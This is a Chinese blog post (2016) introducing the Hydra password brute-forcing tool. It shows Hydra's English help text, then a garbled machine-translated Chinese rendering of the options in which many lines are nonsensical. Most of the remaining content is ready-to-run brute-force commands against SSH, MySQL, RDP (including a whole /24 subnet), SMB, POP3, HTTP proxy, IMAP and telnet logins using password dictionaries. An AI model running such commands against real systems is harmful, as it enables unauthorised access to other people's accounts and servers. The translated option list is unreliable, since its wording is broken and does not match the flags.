Hydra初识

Hydra词出自希腊神话,原意是是九头蛇,后被赫拉克罗斯所杀,成为赫拉克罗斯的12件伟大功绩之一。而在计算机上HC-HYDRA是一个支持多种网络服务的非常快速的网络登陆破解工具。支持ssh,RDP,Mysql,Oracle,http,FTP等诸多协议的暴力破解
hydra
参数详解

root@kali:~# hydra -h
Hydra v8.1 (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Syntax: hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e nsr] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-W TIME] [-f] [-s PORT] [-x MIN:MAX:CHARSET] [-SuvVd46] [service://server[:PORT][/OPT]]

Options:
-R restore a previous aborted/crashed session
-S perform an SSL connect
-s PORT if the service is on a different default port, define it here
-l LOGIN or -L FILE login with LOGIN name, or load several logins from FILE
-p PASS or -P FILE try password PASS, or load several passwords from FILE
-x MIN:MAX:CHARSET password bruteforce generation, type "-x -h" to get help
-e nsr try "n" null password, "s" login as pass and/or "r" reversed login
-u loop around users, not passwords (effective! implied with -x)
-C FILE colon separated "login:pass" format, instead of -L/-P options
-M FILE list of servers to attack, one entry per line, ':' to specify port
-o FILE write found login/password pairs to FILE instead of stdout
-f / -F exit when a login/pass pair is found (-M: -f per host, -F global)
-t TASKS run TASKS number of connects in parallel (per host, default: 16)
-w / -W TIME waittime for responses (32s) / between connects per thread
-4 / -6 prefer IPv4 (default) or IPv6 addresses
-v / -V / -d verbose mode / show login+pass for each attempt / debug mode
-q do not print messages about connection erros
-U service module usage details
server the target: DNS, IP or 192.168.0.0/24 (this OR the -M option)
service the service to crack (see below for supported protocols)
OPT some service modules support additional input (-U for module help)

 

语法:九头蛇[ [ [登录] [文件| L P通过| P文件] [ C ] |文件] ] [电子] [文件] - [任务] [ T M文件[任务] ] [ T·W时间] [ w时间] [ ] [ ] [端口X分钟:麦克斯:字符集] [ suvvd46 ] [服务:/ /服务器[:端口] [选择] ]

选项:

?恢复先前中止/崩溃会话

-执行SSL连接

如果该服务是在不同的默认端口,定义它在这里

l登录或L文件登录的登录名,或装入几个登录文件

?通或-文件尝试密码,或加载几个密码从文件

X分钟:麦克斯:字符密码暴力破解的一代,键入"X H"得到帮助

E NSR尝试"N"空密码,登录通过"S"和/或"R"的反复登录

?用户循环,而不是密码(有效!隐含的- *

?文件结肠分离的"登录:通行证"格式,而不是-/ -磷选项

?我的文件列表服务器攻击,每行一个条目,''指定端口

o文件写入发现登录/密码对文件而不是stdout

?当一个登录/传递对被发现(-),在每个主机,--全球的

?任务的运行任务数的并联连接(每个主机,默认:16

w / w的时间为反应时间(32S/连接的每个线程

4 / 6选择IPv4IPv6地址(默认)

v / v / D详细模式/显示登录+通过每个尝试/调试模式

Q不打印连接错误消息

?服务模块使用细节

服务器的IPDNS,目标:192.168.0.0/24(这或-m选项)

服务的服务来破解(见下面的支持协议)

选择一些服务模块,支持额外的输入(-你的模块帮助)

0×01.暴力破解SSH


root@kali:~# hydra -l root -P /root/pass.txt -t 10 -vV -e ns 10.211.55.35 ssh

0×02.暴力破解Mysql


root@kali:~# hydra -l root -P pass.txt -o savessh.log -f -vV -e ns 10.211.55.10 mysql

0×03暴力破解3389


root@kali:~# hydra 10.211.55.1/24 rdp -l administrator -P pass.txt -V


其他的破解

0×04.破解smb

# hydra -l administrator -P pass.txt 10.36.16.18 smb

0×05.破解pop3

# hydra -l muts -P pass.txt my.pop3.mail pop3

0×06.破解http-proxy

# hydra -l admin -P pass.txt http-proxy://10.36.16.18

0×07.破解imap

# hydra -L user.txt -p secret 10.36.16.18 imap PLAIN
# hydra -C defaults.txt -6 imap://[fe80::2c:31ff:fe12:ac11]:143/PLAIN

0×08.破解telnet

# hydra ip telnet -l 用户 -P 密码字典 -t 32 -s 23 -e ns -f -V

posted @ 2016-01-23 17:49  h4ck0ne  阅读(438)  评论(0编辑  收藏  举报